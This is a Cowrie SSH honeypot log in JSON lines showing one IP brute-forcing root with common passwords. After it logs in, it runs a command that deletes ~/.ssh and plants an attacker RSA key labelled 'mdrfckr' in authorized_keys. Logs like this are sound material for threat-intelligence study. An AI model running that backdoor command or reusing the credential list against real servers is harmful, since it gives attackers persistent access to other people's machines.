{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:53:12.282212Z","src_ip":"212.227.235.229","session":"b6a25d2595af"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:53:12.573169Z","src_ip":"212.227.235.229","session":"4eb6c38383b5"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:53:12.791779Z","src_ip":"212.227.235.229","session":"4eb6c38383b5"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:53:12.802886Z","src_ip":"212.227.235.229","session":"e48d2f310baf"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:53:13.272088Z","src_ip":"212.227.235.229","session":"b6a25d2595af"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:53:14.512407Z","src_ip":"212.227.235.229","session":"b6a25d2595af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49936,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2f84690e978","protocol":"ssh","message":"New connection: 212.227.235.229:49936 (1.2.3.4:22) [session: c2f84690e978]","sensor":"my-vps","timestamp":"2025-08-28T15:53:14.730393Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:53:14.731121Z","src_ip":"212.227.235.229","session":"c2f84690e978"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:53:14.958636Z","src_ip":"212.227.235.229","session":"c2f84690e978"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:53:15.907972Z","src_ip":"212.227.235.229","session":"c2f84690e978"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:53:16.137274Z","src_ip":"212.227.235.229","session":"c2f84690e978"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:53:16.143348Z","src_ip":"212.227.235.229","session":"c8fbe30dbe17"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64916,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a0d30827af3","protocol":"ssh","message":"New connection: 217.72.205.35:64916 (1.2.3.4:22) [session: 2a0d30827af3]","sensor":"my-vps","timestamp":"2025-08-28T15:53:31.565812Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:53:31.566983Z","src_ip":"217.72.205.35","session":"2a0d30827af3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34544,"dst_ip":"1.2.3.4","dst_port":22,"session":"44c5d8a22575","protocol":"ssh","message":"New connection: 212.227.235.229:34544 (1.2.3.4:22) [session: 44c5d8a22575]","sensor":"my-vps","timestamp":"2025-08-28T15:53:45.878718Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:53:45.879615Z","src_ip":"212.227.235.229","session":"44c5d8a22575"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:53:46.194711Z","src_ip":"212.227.235.229","session":"44c5d8a22575"}
{"eventid":"cowrie.login.failed","username":"dayz","password":"dayz","message":"login attempt [dayz/dayz] failed","sensor":"my-vps","timestamp":"2025-08-28T15:53:47.494716Z","src_ip":"212.227.235.229","session":"44c5d8a22575"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:53:48.812338Z","src_ip":"212.227.235.229","session":"44c5d8a22575"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48900,"dst_ip":"1.2.3.4","dst_port":22,"session":"868ca98d9780","protocol":"ssh","message":"New connection: 212.227.235.229:48900 (1.2.3.4:22) [session: 868ca98d9780]","sensor":"my-vps","timestamp":"2025-08-28T15:53:56.822797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T15:53:56.823733Z","src_ip":"212.227.235.229","session":"868ca98d9780"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T15:53:57.088382Z","src_ip":"212.227.235.229","session":"868ca98d9780"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword@123","message":"login attempt [root/P@ssword@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:53:58.184826Z","src_ip":"212.227.235.229","session":"868ca98d9780"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:53:59.119901Z","src_ip":"212.227.235.229","session":"868ca98d9780"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:53:59.120739Z","src_ip":"212.227.235.229","session":"868ca98d9780"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:53:59.121781Z","src_ip":"212.227.235.229","session":"868ca98d9780"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:53:59.650420Z","src_ip":"212.227.235.229","session":"868ca98d9780"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:53:59.934153Z","src_ip":"212.227.235.229","session":"868ca98d9780"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:53:59.934855Z","src_ip":"212.227.235.229","session":"868ca98d9780"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:54:00.200649Z","src_ip":"212.227.235.229","session":"868ca98d9780"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:54:00.201603Z","src_ip":"212.227.235.229","session":"868ca98d9780"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49512,"dst_ip":"1.2.3.4","dst_port":22,"session":"cdf4e3f17a3f","protocol":"ssh","message":"New connection: 212.227.235.229:49512 (1.2.3.4:22) [session: cdf4e3f17a3f]","sensor":"my-vps","timestamp":"2025-08-28T15:54:00.464471Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T15:54:00.465172Z","src_ip":"212.227.235.229","session":"cdf4e3f17a3f"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T15:54:00.727889Z","src_ip":"212.227.235.229","session":"cdf4e3f17a3f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43460,"dst_ip":"1.2.3.4","dst_port":22,"session":"3cfab9cc5960","protocol":"ssh","message":"New connection: 212.227.235.229:43460 (1.2.3.4:22) [session: 3cfab9cc5960]","sensor":"my-vps","timestamp":"2025-08-28T15:54:01.253317Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:54:01.254153Z","src_ip":"212.227.235.229","session":"3cfab9cc5960"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:54:01.480115Z","src_ip":"212.227.235.229","session":"3cfab9cc5960"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:54:01.819963Z","src_ip":"212.227.235.229","session":"cdf4e3f17a3f"}
{"eventid":"cowrie.login.failed","username":"stefan","password":"stefan","message":"login attempt [stefan/stefan] failed","sensor":"my-vps","timestamp":"2025-08-28T15:54:02.429339Z","src_ip":"212.227.235.229","session":"3cfab9cc5960"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:54:03.084598Z","src_ip":"212.227.235.229","session":"cdf4e3f17a3f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50094,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a84753ca2a6","protocol":"ssh","message":"New connection: 212.227.235.229:50094 (1.2.3.4:22) [session: 9a84753ca2a6]","sensor":"my-vps","timestamp":"2025-08-28T15:54:03.352849Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T15:54:03.354261Z","src_ip":"212.227.235.229","session":"9a84753ca2a6"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T15:54:03.619876Z","src_ip":"212.227.235.229","session":"9a84753ca2a6"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:54:03.656274Z","src_ip":"212.227.235.229","session":"3cfab9cc5960"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:54:04.721691Z","src_ip":"212.227.235.229","session":"9a84753ca2a6"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:54:04.988007Z","src_ip":"212.227.235.229","session":"868ca98d9780"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:54:04.989063Z","src_ip":"212.227.235.229","session":"9a84753ca2a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53974,"dst_ip":"1.2.3.4","dst_port":22,"session":"09ff87594c8a","protocol":"ssh","message":"New connection: 212.227.235.229:53974 (1.2.3.4:22) [session: 09ff87594c8a]","sensor":"my-vps","timestamp":"2025-08-28T15:54:17.866393Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:54:17.867251Z","src_ip":"212.227.235.229","session":"09ff87594c8a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:54:18.080141Z","src_ip":"212.227.235.229","session":"09ff87594c8a"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa456789","message":"login attempt [root/Aa456789] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:54:18.970155Z","src_ip":"212.227.235.229","session":"09ff87594c8a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:54:19.416049Z","src_ip":"212.227.235.229","session":"09ff87594c8a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:54:19.416715Z","src_ip":"212.227.235.229","session":"09ff87594c8a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:54:19.418154Z","src_ip":"212.227.235.229","session":"09ff87594c8a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:54:19.631677Z","src_ip":"212.227.235.229","session":"09ff87594c8a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:54:20.116102Z","src_ip":"212.227.235.229","session":"09ff87594c8a"}
